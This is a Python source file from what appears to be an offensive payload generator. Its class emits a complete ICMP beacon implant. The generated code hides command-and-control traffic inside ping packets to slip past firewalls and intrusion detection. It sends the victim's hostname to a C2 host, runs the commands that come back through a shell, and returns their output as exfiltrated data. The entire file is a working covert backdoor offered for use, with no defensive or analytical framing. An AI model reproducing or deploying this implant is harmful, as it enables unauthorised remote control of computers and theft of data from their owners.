# icmp beacon stager
# uses ping packets to communicate with c2
# works when tcp/udp are blocked but icmp is allowed

from generators.base import BaseGenerator


class ICMPBeaconGenerator(BaseGenerator):
    LANG_ID = "icmp"
    LANG_NAME = "ICMP Beacon"
    FILE_EXT = ".py"

    def generate(self, host, port, opts, ptype, tpl, adv):
        code = (
            "import socket, struct, os, subprocess, time, sys\n\n"
            "# icmp beacon - hides c2 traffic inside ping packets\n"
            "# the payload bytes ride in the icmp data section\n"
            "# most firewalls and ids dont inspect icmp payload content\n\n"
            f"C2_HOST = '{host}'\n"
            "ICMP_ECHO_REQUEST = 8\n"
            "ICMP_ECHO_REPLY = 0\n\n"
            "def checksum(data):\n"
            "    s = 0\n"
            "    n = len(data) % 2\n"
            "    for i in range(0, len(data) - n, 2):\n"
            "        s += (data[i]) + ((data[i+1]) << 8)\n"
            "    if n:\n"
            "        s += data[-1]\n"
            "    while (s >> 16):\n"
            "        s = (s & 0xFFFF) + (s >> 16)\n"
            "    return ~s & 0xFFFF\n\n"
            "def send_icmp(sock, dest, payload):\n"
            "    \"\"\"send an icmp echo request with our data in the payload\"\"\"\n"
            "    pid = os.getpid() & 0xFFFF\n"
            "    header = struct.pack('!BBHHH', ICMP_ECHO_REQUEST, 0, 0, pid, 1)\n"
            "    chk = checksum(header + payload)\n"
            "    header = struct.pack('!BBHHH', ICMP_ECHO_REQUEST, 0, chk, pid, 1)\n"
            "    sock.sendto(header + payload, (dest, 0))\n\n"
            "def recv_icmp(sock, timeout=10):\n"
            "    \"\"\"wait for an icmp reply and extract the data payload\"\"\"\n"
            "    sock.settimeout(timeout)\n"
            "    try:\n"
            "        data, addr = sock.recvfrom(4096)\n"
            "        # skip ip header (20 bytes) and icmp header (8 bytes)\n"
            "        return data[28:]\n"
            "    except:\n"
            "        return b''\n\n"
            "def beacon():\n"
            "    \"\"\"main loop - check in with c2 and run commands\"\"\"\n"
            "    try:\n"
            "        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)\n"
            "    except PermissionError:\n"
            "        sys.exit(0)  # need admin/root for raw sockets\n\n"
            "    while True:\n"
            "        try:\n"
            "            # send a checkin beacon with hostname\n"
            "            hostname = socket.gethostname().encode()\n"
            "            send_icmp(sock, C2_HOST, b'BEACON:' + hostname)\n\n"
            "            # wait for a command from c2\n"
            "            reply = recv_icmp(sock)\n"
            "            if reply and reply != b'':\n"
            "                cmd = reply.decode(errors='ignore').strip()\n"
            "                if cmd == 'exit':\n"
            "                    break\n"
            "                if cmd:\n"
            "                    result = subprocess.getoutput(cmd)\n"
            "                    # send result back in chunks that fit in icmp\n"
            "                    chunk_size = 512\n"
            "                    for i in range(0, len(result), chunk_size):\n"
            "                        send_icmp(sock, C2_HOST, result[i:i+chunk_size].encode())\n"
            "                        time.sleep(0.1)\n"
            "        except: pass\n\n"
            "        time.sleep(5)  # beacon interval\n\n"
            "    sock.close()\n\n"
            "if __name__ == '__main__':\n"
            "    beacon()\n"
        )
        return code
